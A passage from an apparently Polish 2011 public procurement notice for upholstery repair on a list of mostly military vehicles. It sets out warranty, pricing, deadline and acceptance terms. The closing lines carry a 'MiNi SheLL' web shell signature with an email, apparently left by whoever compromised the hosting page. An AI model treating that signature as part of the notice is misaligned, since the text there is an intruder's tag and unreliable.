 warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
2.	Nie dopuszcza się zmian konstrukcyjnych naprawianych elementów tapicerki.
3.	materiały użyte do naprawy będą nowe. Na żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia materiałów.
4.	Na wykonaną usługę zostanie udzielona minimum 6-miesieczna gwarancja od daty wykonania usługi 
5.	Cena części zużytych materiałów nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
6.	Cena za naprawę nie może przekraczać 60% wartości nowego elementu. 
7.	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
8.	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych materiałów.
9.	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług, 
10.	Termin wykonania usługi nie może być dłuższy niż 7 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
11.	Materiały eksploatacyjne użyte w czasie naprawy musza być zgodne z zaleceniem producenta danego podzespołu.
12.	Materiały użyte w czasie naprawy a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
13.	Każdorazowa naprawa  poprzedzona będzie wstępnym kosztorysem jej wykonania (dostarczonego przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
14.	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. wyposażeniem umożliwiającym usunięci usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia  oraz stosownym personelem.
15.	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.

	Miejsce realizacji zamówienia: 

 W zakładzie wykonującym usługę. Podzespoły przeznaczone do naprawy wykonawca odbiera z siedziby zamawiającego i przekazuje od  siedziby zamawiającego na koszt własny, co uwzględnił w złożonej ofercie /zapis ten nie dotyczy wykonawcy, którego zakład naprawczy mieści się na terenie m. Koszalin lub w odległości  do 20 km. od granic miasta- w tym przypadku zamawiający sam dostarczy podzespoły i urządzenia do wykonawcy /
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Naprawa poszczególnych elementów tapicerki samochodowej  obejmuje:

Zakres  naprawy w zadaniu będzie obejmował następujące czynności  :

1. naprawa siedzeń;
2. naprawa poszyć bocznych drzwi;
3. naprawa poszycia maski silnika;
4. naprawa leżanek w pojazdach specjalnych;
5. naprawa hamaków pojazdy specjalne;
6. naprawa podsufitek w kabinie kierowcy;

Wyżej wymieniony zakres naprawy elementów tapicerki samochodowej obejmuje wszystkie pojazdy wymienione poniżej:

TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223






Warunki odbioru usługi:

1. Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania naprawy ) będzie protokół  odbioru podpisany przez obie strony.
2. W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył  do naprawy elementów tapicerki samochodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Marża - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com